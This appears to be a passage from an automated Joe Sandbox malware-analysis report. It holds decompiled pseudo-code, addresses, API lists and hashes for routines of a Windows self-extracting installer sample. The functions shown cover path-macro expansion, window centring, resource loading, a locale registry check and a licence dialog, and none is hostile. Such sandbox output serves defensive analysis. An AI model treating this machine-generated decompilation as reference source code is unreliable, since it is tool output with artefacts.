                                                                        • API ID: Window$DialogText$DesktopForegroundItem
                                                                        • String ID: lenta
                                                                        • API String ID: 852535152-2780258678
                                                                        • Opcode ID: 28b19400a3160db1bae7c7307e39070d44561eb9469a0f1921361671eebdf787
                                                                        • Instruction ID: 205de05db856f561b37e3643a9dfe1756f805cb57f51f47aa3af6a2b1fb34019
                                                                        • Opcode Fuzzy Hash: 28b19400a3160db1bae7c7307e39070d44561eb9469a0f1921361671eebdf787
                                                                        • Instruction Fuzzy Hash: 0001F732640118ABC717EF66DC0C96E7B66EB05730F108010F987966B1CBB19F41FBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 95%
                                                                        			E00F32AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t16;
                                                                        				int _t21;
                                                                        				char _t32;
                                                                        				intOrPtr _t34;
                                                                        				char* _t38;
                                                                        				char _t42;
                                                                        				char* _t44;
                                                                        				CHAR* _t52;
                                                                        				intOrPtr* _t55;
                                                                        				CHAR* _t59;
                                                                        				void* _t62;
                                                                        				CHAR* _t64;
                                                                        				CHAR* _t65;
                                                                        				signed int _t66;
                                                                        
                                                                        				_t60 = __edx;
                                                                        				_t16 =  *0xf38004; // 0xc69e30f7
                                                                        				_t17 = _t16 ^ _t66;
                                                                        				_v8 = _t16 ^ _t66;
                                                                        				_t65 = _a4;
                                                                        				_t44 = __edx;
                                                                        				_t64 = __ecx;
                                                                        				if( *((char*)(__ecx)) != 0) {
                                                                        					GetModuleFileNameA( *0xf39a3c,  &_v268, 0x104);
                                                                        					while(1) {
                                                                        						_t17 =  *_t64;
                                                                        						if(_t17 == 0) {
                                                                        							break;
                                                                        						}
                                                                        						_t21 = IsDBCSLeadByte(_t17);
                                                                        						 *_t65 =  *_t64;
                                                                        						if(_t21 != 0) {
                                                                        							_t65[1] = _t64[1];
                                                                        						}
                                                                        						if( *_t64 != 0x23) {
                                                                        							L19:
                                                                        							_t65 = CharNextA(_t65);
                                                                        						} else {
                                                                        							_t64 = CharNextA(_t64);
                                                                        							if(CharUpperA( *_t64) != 0x44) {
                                                                        								if(CharUpperA( *_t64) != 0x45) {
                                                                        									if( *_t64 == 0x23) {
                                                                        										goto L19;
                                                                        									}
                                                                        								} else {
                                                                        									E00F31680(_t65, E00F317C8(_t44, _t65),  &_v268);
                                                                        									_t52 = _t65;
                                                                        									_t14 =  &(_t52[1]); // 0x2
                                                                        									_t60 = _t14;
                                                                        									do {
                                                                        										_t32 =  *_t52;
                                                                        										_t52 =  &(_t52[1]);
                                                                        									} while (_t32 != 0);
                                                                        									goto L17;
                                                                        								}
                                                                        							} else {
                                                                        								E00F365E8( &_v268);
                                                                        								_t55 =  &_v268;
                                                                        								_t62 = _t55 + 1;
                                                                        								do {
                                                                        									_t34 =  *_t55;
                                                                        									_t55 = _t55 + 1;
                                                                        								} while (_t34 != 0);
                                                                        								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                        								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                        									 *_t38 = 0;
                                                                        								}
                                                                        								E00F31680(_t65, E00F317C8(_t44, _t65),  &_v268);
                                                                        								_t59 = _t65;
                                                                        								_t12 =  &(_t59[1]); // 0x2
                                                                        								_t60 = _t12;
                                                                        								do {
                                                                        									_t42 =  *_t59;
                                                                        									_t59 =  &(_t59[1]);
                                                                        								} while (_t42 != 0);
                                                                        								L17:
                                                                        								_t65 =  &(_t65[_t52 - _t60]);
                                                                        							}
                                                                        						}
                                                                        						_t64 = CharNextA(_t64);
                                                                        					}
                                                                        					 *_t65 = _t17;
                                                                        				}
                                                                        				return E00F36CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                        			}






















                                                                        0x00f32aac
                                                                        0x00f32ab7
                                                                        0x00f32abc
                                                                        0x00f32abe
                                                                        0x00f32ac3
                                                                        0x00f32ac6
                                                                        0x00f32ac9
                                                                        0x00f32ace
                                                                        0x00f32ae6
                                                                        0x00f32bdc
                                                                        0x00f32bdc
                                                                        0x00f32be0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f32af2
                                                                        0x00f32afc
                                                                        0x00f32b00
                                                                        0x00f32b05
                                                                        0x00f32b05
                                                                        0x00f32b0b
                                                                        0x00f32bca
                                                                        0x00f32bd1
                                                                        0x00f32b11
                                                                        0x00f32b18
                                                                        0x00f32b26
                                                                        0x00f32b99
                                                                        0x00f32bc8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f32b9b
                                                                        0x00f32bae
                                                                        0x00f32bb3
                                                                        0x00f32bb5
                                                                        0x00f32bb5
                                                                        0x00f32bb8
                                                                        0x00f32bb8
                                                                        0x00f32bba
                                                                        0x00f32bbb
                                                                        0x00000000
                                                                        0x00f32bb8
                                                                        0x00f32b28
                                                                        0x00f32b2e
                                                                        0x00f32b33
                                                                        0x00f32b39
                                                                        0x00f32b3c
                                                                        0x00f32b3c
                                                                        0x00f32b3e
                                                                        0x00f32b3f
                                                                        0x00f32b55
                                                                        0x00f32b5d
                                                                        0x00f32b64
                                                                        0x00f32b64
                                                                        0x00f32b7a
                                                                        0x00f32b7f
                                                                        0x00f32b81
                                                                        0x00f32b81
                                                                        0x00f32b84
                                                                        0x00f32b84
                                                                        0x00f32b86
                                                                        0x00f32b87
                                                                        0x00f32bbf
                                                                        0x00f32bc1
                                                                        0x00f32bc1
                                                                        0x00f32b26
                                                                        0x00f32bda
                                                                        0x00f32bda
                                                                        0x00f32be6
                                                                        0x00f32be6
                                                                        0x00f32bf8

                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00F32AE6
                                                                        • IsDBCSLeadByte.KERNEL32(00000000), ref: 00F32AF2
                                                                        • CharNextA.USER32(?), ref: 00F32B12
                                                                        • CharUpperA.USER32 ref: 00F32B1E
                                                                        • CharPrevA.USER32(?,?), ref: 00F32B55
                                                                        • CharNextA.USER32(?), ref: 00F32BD4
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                        • String ID:
                                                                        • API String ID: 571164536-0
                                                                        • Opcode ID: d48dc3baa238f6f957180c1cdff8ae2959bb9614f0a24223c69f37300ae1e7e0
                                                                        • Instruction ID: a8d1733eb7abdbbaebe60c3077966aeb64eaa6fb005d482f22a413306aba017a
                                                                        • Opcode Fuzzy Hash: d48dc3baa238f6f957180c1cdff8ae2959bb9614f0a24223c69f37300ae1e7e0
                                                                        • Instruction Fuzzy Hash: 9A414B349042899FDF559F349C54AFDBB6A9F92330F0440DAE8C283202DF354E46EB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E00F343D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                        				signed int _v8;
                                                                        				struct tagRECT _v24;
                                                                        				struct tagRECT _v40;
                                                                        				struct HWND__* _v44;
                                                                        				intOrPtr _v48;
                                                                        				int _v52;
                                                                        				intOrPtr _v56;
                                                                        				int _v60;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t29;
                                                                        				void* _t53;
                                                                        				intOrPtr _t56;
                                                                        				int _t59;
                                                                        				struct HWND__* _t63;
                                                                        				struct HWND__* _t67;
                                                                        				struct HWND__* _t68;
                                                                        				struct HDC__* _t69;
                                                                        				int _t72;
                                                                        				signed int _t74;
                                                                        
                                                                        				_t63 = __edx;
                                                                        				_t29 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t29 ^ _t74;
                                                                        				_t68 = __edx;
                                                                        				_v44 = __ecx;
                                                                        				GetWindowRect(__ecx,  &_v40);
                                                                        				_t53 = _v40.bottom - _v40.top;
                                                                        				_v48 = _v40.right - _v40.left;
                                                                        				GetWindowRect(_t68,  &_v24);
                                                                        				_v56 = _v24.bottom - _v24.top;
                                                                        				_t69 = GetDC(_v44);
                                                                        				_v52 = GetDeviceCaps(_t69, 8);
                                                                        				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                        				ReleaseDC(_v44, _t69);
                                                                        				_t56 = _v48;
                                                                        				asm("cdq");
                                                                        				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                        				_t67 = 0;
                                                                        				if(_t72 >= 0) {
                                                                        					_t63 = _v52;
                                                                        					if(_t72 + _t56 > _t63) {
                                                                        						_t72 = _t63 - _t56;
                                                                        					}
                                                                        				} else {
                                                                        					_t72 = _t67;
                                                                        				}
                                                                        				asm("cdq");
                                                                        				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                        				if(_t59 >= 0) {
                                                                        					_t63 = _v60;
                                                                        					if(_t59 + _t53 > _t63) {
                                                                        						_t59 = _t63 - _t53;
                                                                        					}
                                                                        				} else {
                                                                        					_t59 = _t67;
                                                                        				}
                                                                        				return E00F36CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                        			}
























                                                                        0x00f343d0
                                                                        0x00f343d8
                                                                        0x00f343df
                                                                        0x00f343e6
                                                                        0x00f343ec
                                                                        0x00f343f1
                                                                        0x00f34400
                                                                        0x00f34403
                                                                        0x00f3440b
                                                                        0x00f34420
                                                                        0x00f34429
                                                                        0x00f34437
                                                                        0x00f34444
                                                                        0x00f34447
                                                                        0x00f3444d
                                                                        0x00f34454
                                                                        0x00f3445b
                                                                        0x00f34460
                                                                        0x00f34461
                                                                        0x00f34467
                                                                        0x00f3446f
                                                                        0x00f34473
                                                                        0x00f34473
                                                                        0x00f34463
                                                                        0x00f34463
                                                                        0x00f34463
                                                                        0x00f3447a
                                                                        0x00f34481
                                                                        0x00f34484
                                                                        0x00f3448a
                                                                        0x00f34492
                                                                        0x00f34496
                                                                        0x00f34496
                                                                        0x00f34486
                                                                        0x00f34486
                                                                        0x00f34486
                                                                        0x00f344b8

                                                                        APIs
                                                                        • GetWindowRect.USER32(?,?), ref: 00F343F1
                                                                        • GetWindowRect.USER32(00000000,?), ref: 00F3440B
                                                                        • GetDC.USER32(?), ref: 00F34423
                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00F3442E
                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00F3443A
                                                                        • ReleaseDC.USER32(?,00000000), ref: 00F34447
                                                                        • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001,?), ref: 00F344A2
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CapsDeviceRect$Release
                                                                        • String ID:
                                                                        • API String ID: 2212493051-0
                                                                        • Opcode ID: 6c06ff2d5dc526cb11855aff7ec50648d25c8138ec36d6c394ccd45f377df7e7
                                                                        • Instruction ID: 38555c31e51698dc9385feffcda605d33551ea6e16978bd84e12ca44a7bfd1dd
                                                                        • Opcode Fuzzy Hash: 6c06ff2d5dc526cb11855aff7ec50648d25c8138ec36d6c394ccd45f377df7e7
                                                                        • Instruction Fuzzy Hash: 56314C72E0011DAFCB14DFB9DD899EEBBB6EB89320F154169F805F3250DA30AD059B60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 53%
                                                                        			E00F36298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                        				signed int _v8;
                                                                        				char _v28;
                                                                        				intOrPtr _v32;
                                                                        				struct HINSTANCE__* _v36;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t16;
                                                                        				struct HRSRC__* _t21;
                                                                        				intOrPtr _t26;
                                                                        				void* _t30;
                                                                        				struct HINSTANCE__* _t36;
                                                                        				intOrPtr* _t40;
                                                                        				void* _t41;
                                                                        				intOrPtr* _t44;
                                                                        				intOrPtr* _t45;
                                                                        				void* _t47;
                                                                        				signed int _t50;
                                                                        				struct HINSTANCE__* _t51;
                                                                        
                                                                        				_t44 = __edx;
                                                                        				_t16 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t16 ^ _t50;
                                                                        				_t46 = 0;
                                                                        				_v32 = __ecx;
                                                                        				_v36 = 0;
                                                                        				_t36 = 1;
                                                                        				E00F3171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                        				while(1) {
                                                                        					_t51 = _t51 + 0x10;
                                                                        					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                        					if(_t21 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                        					if(_t45 == 0) {
                                                                        						 *0xf39124 = 0x80070714;
                                                                        						_t36 = _t46;
                                                                        					} else {
                                                                        						_t5 = _t45 + 8; // 0x8
                                                                        						_t44 = _t5;
                                                                        						_t40 = _t44;
                                                                        						_t6 = _t40 + 1; // 0x9
                                                                        						_t47 = _t6;
                                                                        						do {
                                                                        							_t26 =  *_t40;
                                                                        							_t40 = _t40 + 1;
                                                                        						} while (_t26 != 0);
                                                                        						_t41 = _t40 - _t47;
                                                                        						_t46 = _t51;
                                                                        						_t7 = _t41 + 1; // 0xa
                                                                        						 *0xf3a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                        						_t30 = _v32();
                                                                        						if(_t51 != _t51) {
                                                                        							asm("int 0x29");
                                                                        						}
                                                                        						_push(_t45);
                                                                        						if(_t30 == 0) {
                                                                        							_t36 = 0;
                                                                        							FreeResource(??);
                                                                        						} else {
                                                                        							FreeResource();
                                                                        							_v36 = _v36 + 1;
                                                                        							E00F3171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                        							_t46 = 0;
                                                                        							continue;
                                                                        						}
                                                                        					}
                                                                        					L12:
                                                                        					return E00F36CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                        				}
                                                                        				goto L12;
                                                                        			}






















                                                                        0x00f36298
                                                                        0x00f362a0
                                                                        0x00f362a7
                                                                        0x00f362ad
                                                                        0x00f362af
                                                                        0x00f362bb
                                                                        0x00f362c3
                                                                        0x00f362c4
                                                                        0x00f3633b
                                                                        0x00f3633b
                                                                        0x00f36345
                                                                        0x00f3634d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f362da
                                                                        0x00f362de
                                                                        0x00f3635f
                                                                        0x00f36369
                                                                        0x00f362e0
                                                                        0x00f362e0
                                                                        0x00f362e0
                                                                        0x00f362e3
                                                                        0x00f362e5
                                                                        0x00f362e5
                                                                        0x00f362e8
                                                                        0x00f362e8
                                                                        0x00f362ea
                                                                        0x00f362eb
                                                                        0x00f362ef
                                                                        0x00f362f1
                                                                        0x00f362f3
                                                                        0x00f36302
                                                                        0x00f36308
                                                                        0x00f3630d
                                                                        0x00f36314
                                                                        0x00f36314
                                                                        0x00f36316
                                                                        0x00f36319
                                                                        0x00f36355
                                                                        0x00f36357
                                                                        0x00f3631b
                                                                        0x00f3631b
                                                                        0x00f36331
                                                                        0x00f36334
                                                                        0x00f36339
                                                                        0x00000000
                                                                        0x00f36339
                                                                        0x00f36319
                                                                        0x00f3636b
                                                                        0x00f3637d
                                                                        0x00f3637d
                                                                        0x00000000

                                                                        APIs
                                                                          • Part of subcall function 00F3171E: _vsnprintf.MSVCRT ref: 00F31750
                                                                        • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00F351CA,00000004,00000024,00F32F71,?,00000002,00000000), ref: 00F362CD
                                                                        • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00F351CA,00000004,00000024,00F32F71,?,00000002,00000000), ref: 00F362D4
                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00F351CA,00000004,00000024,00F32F71,?,00000002,00000000), ref: 00F3631B
                                                                        • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00F36345
                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00F351CA,00000004,00000024,00F32F71,?,00000002,00000000), ref: 00F36357
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                        • String ID: UPDFILE%lu
                                                                        • API String ID: 2922116661-2329316264
                                                                        • Opcode ID: af4f895ed3716b29484c1c9bc1b51ca445d2886f5f69f129578b71184609b413
                                                                        • Instruction ID: 54a594ff12820faa4ed68e9f17a3e67d48ceea550d0b6636afafef6a8429eb37
                                                                        • Opcode Fuzzy Hash: af4f895ed3716b29484c1c9bc1b51ca445d2886f5f69f129578b71184609b413
                                                                        • Instruction Fuzzy Hash: 0C21F371A00219ABDB14AFA58C459BFBB79FF48730F044129F942E3241DB799D02ABE1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E00F3681F(void* __ebx) {
                                                                        				signed int _v8;
                                                                        				char _v20;
                                                                        				struct _OSVERSIONINFOA _v168;
                                                                        				void* _v172;
                                                                        				int* _v176;
                                                                        				int _v180;
                                                                        				int _v184;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t19;
                                                                        				long _t31;
                                                                        				signed int _t35;
                                                                        				void* _t36;
                                                                        				intOrPtr _t41;
                                                                        				signed int _t44;
                                                                        
                                                                        				_t36 = __ebx;
                                                                        				_t19 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t19 ^ _t44;
                                                                        				_t41 =  *0xf381d8; // 0xfffffffe
                                                                        				_t43 = 0;
                                                                        				_v180 = 0xc;
                                                                        				_v176 = 0;
                                                                        				if(_t41 == 0xfffffffe) {
                                                                        					 *0xf381d8 = 0;
                                                                        					_v168.dwOSVersionInfoSize = 0x94;
                                                                        					if(GetVersionExA( &_v168) == 0) {
                                                                        						L12:
                                                                        						_t41 =  *0xf381d8; // 0xfffffffe
                                                                        					} else {
                                                                        						_t41 = 1;
                                                                        						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                        							goto L12;
                                                                        						} else {
                                                                        							_t31 = RegQueryValueExA(_v172, 0xf31140, 0,  &_v184,  &_v20,  &_v180);
                                                                        							_t43 = _t31;
                                                                        							RegCloseKey(_v172);
                                                                        							if(_t31 != 0) {
                                                                        								goto L12;
                                                                        							} else {
                                                                        								_t40 =  &_v176;
                                                                        								if(E00F366F9( &_v20,  &_v176) == 0) {
                                                                        									goto L12;
                                                                        								} else {
                                                                        									_t35 = _v176 & 0x000003ff;
                                                                        									if(_t35 == 1 || _t35 == 0xd) {
                                                                        										 *0xf381d8 = _t41;
                                                                        									} else {
                                                                        										goto L12;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return E00F36CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                        			}


















                                                                        0x00f3681f
                                                                        0x00f3682a
                                                                        0x00f36831
                                                                        0x00f36836
                                                                        0x00f3683c
                                                                        0x00f3683e
                                                                        0x00f36848
                                                                        0x00f36851
                                                                        0x00f3685d
                                                                        0x00f36864
                                                                        0x00f36876
                                                                        0x00f3693a
                                                                        0x00f3693a
                                                                        0x00f3687c
                                                                        0x00f3687e
                                                                        0x00f36885
                                                                        0x00000000
                                                                        0x00f368d6
                                                                        0x00f368f4
                                                                        0x00f36900
                                                                        0x00f36902
                                                                        0x00f3690a
                                                                        0x00000000
                                                                        0x00f3690c
                                                                        0x00f3690c
                                                                        0x00f3691c
                                                                        0x00000000
                                                                        0x00f3691e
                                                                        0x00f36924
                                                                        0x00f3692b
                                                                        0x00f36932
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f3692b
                                                                        0x00f3691c
                                                                        0x00f3690a
                                                                        0x00f36885
                                                                        0x00f36876
                                                                        0x00f36951

                                                                        APIs
                                                                        • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00F3686E
                                                                        • GetSystemMetrics.USER32(0000004A), ref: 00F368A7
                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00F368CC
                                                                        • RegQueryValueExA.ADVAPI32(?,00F31140,00000000,?,?,0000000C), ref: 00F368F4
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00F36902
                                                                          • Part of subcall function 00F366F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00F3691A), ref: 00F36741
                                                                        Strings
                                                                        • Control Panel\Desktop\ResourceLocale, xrefs: 00F368C2
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                        • String ID: Control Panel\Desktop\ResourceLocale
                                                                        • API String ID: 3346862599-1109908249
                                                                        • Opcode ID: 7b4a10b4ef156828bbef13222eacc72706cfd9e57fdf895a363449468f4cd6bd
                                                                        • Instruction ID: c0941e2a8b48279a07a137ca81030953e490e9f1eccd0641c4d286409e92a21f
                                                                        • Opcode Fuzzy Hash: 7b4a10b4ef156828bbef13222eacc72706cfd9e57fdf895a363449468f4cd6bd
                                                                        • Instruction Fuzzy Hash: E231DF71E01318AFDB21CB11CC04BAAB7B9FB41378F1040A5E949E2140CBB09E8AEF52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F33A3F(void* __eflags) {
                                                                        				void* _t3;
                                                                        				void* _t9;
                                                                        				CHAR* _t16;
                                                                        
                                                                        				_t16 = "LICENSE";
                                                                        				_t1 = E00F3468F(_t16, 0, 0) + 1; // 0x1
                                                                        				_t3 = LocalAlloc(0x40, _t1);
                                                                        				 *0xf38d4c = _t3;
                                                                        				if(_t3 != 0) {
                                                                        					_t19 = _t16;
                                                                        					if(E00F3468F(_t16, _t3, _t28) != 0) {
                                                                        						if(lstrcmpA( *0xf38d4c, "<None>") == 0) {
                                                                        							LocalFree( *0xf38d4c);
                                                                        							L9:
                                                                        							 *0xf39124 = 0;
                                                                        							return 1;
                                                                        						}
                                                                        						_t9 = E00F36517(_t19, 0x7d1, 0, E00F33100, 0, 0);
                                                                        						LocalFree( *0xf38d4c);
                                                                        						if(_t9 != 0) {
                                                                        							goto L9;
                                                                        						}
                                                                        						 *0xf39124 = 0x800704c7;
                                                                        						L2:
                                                                        						return 0;
                                                                        					}
                                                                        					E00F344B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                        					LocalFree( *0xf38d4c);
                                                                        					 *0xf39124 = 0x80070714;
                                                                        					goto L2;
                                                                        				}
                                                                        				E00F344B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                        				 *0xf39124 = E00F36285();
                                                                        				goto L2;
                                                                        			}






                                                                        0x00f33a46
                                                                        0x00f33a57
                                                                        0x00f33a5d
                                                                        0x00f33a63
                                                                        0x00f33a6a
                                                                        0x00f33a91
                                                                        0x00f33a9a
                                                                        0x00f33ad8
                                                                        0x00f33b13
                                                                        0x00f33b19
                                                                        0x00f33b1b
                                                                        0x00000000
                                                                        0x00f33b21
                                                                        0x00f33ae7
                                                                        0x00f33af4
                                                                        0x00f33afc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f33afe
                                                                        0x00f33a87
                                                                        0x00000000
                                                                        0x00f33a87
                                                                        0x00f33aa8
                                                                        0x00f33ab3
                                                                        0x00f33ab9
                                                                        0x00000000
                                                                        0x00f33ab9
                                                                        0x00f33a78
                                                                        0x00f33a82
                                                                        0x00000000

                                                                        APIs
                                                                          • Part of subcall function 00F3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F346A0
                                                                          • Part of subcall function 00F3468F: SizeofResource.KERNEL32(00000000,00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346A9
                                                                          • Part of subcall function 00F3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F346C3
                                                                          • Part of subcall function 00F3468F: LoadResource.KERNEL32(00000000,00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346CC
                                                                          • Part of subcall function 00F3468F: LockResource.KERNEL32(00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346D3
                                                                          • Part of subcall function 00F3468F: memcpy_s.MSVCRT ref: 00F346E5
                                                                          • Part of subcall function 00F3468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346EF
                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00F32F64,?,00000002,00000000), ref: 00F33A5D
                                                                        • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00F33AB3
                                                                          • Part of subcall function 00F344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F34518
                                                                          • Part of subcall function 00F344B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00F34554
                                                                          • Part of subcall function 00F36285: GetLastError.KERNEL32(00F35BBC), ref: 00F36285
                                                                        • lstrcmpA.KERNEL32(<None>,00000000), ref: 00F33AD0
                                                                        • LocalFree.KERNEL32 ref: 00F33B13
                                                                          • Part of subcall function 00F36517: FindResourceA.KERNEL32(00F30000,000007D6,00000005), ref: 00F3652A
                                                                          • Part of subcall function 00F36517: LoadResource.KERNEL32(00F30000,00000000,?,?,00F32EE8,00000000,00F319E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00F36538
                                                                          • Part of subcall function 00F36517: DialogBoxIndirectParamA.USER32(00F30000,00000000,00000547,00F319E0,00000000), ref: 00F36557
                                                                          • Part of subcall function 00F36517: FreeResource.KERNEL32(00000000,?,?,00F32EE8,00000000,00F319E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00F36560
                                                                        • LocalFree.KERNEL32(00000000,00F33100,00000000,00000000), ref: 00F33AF4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
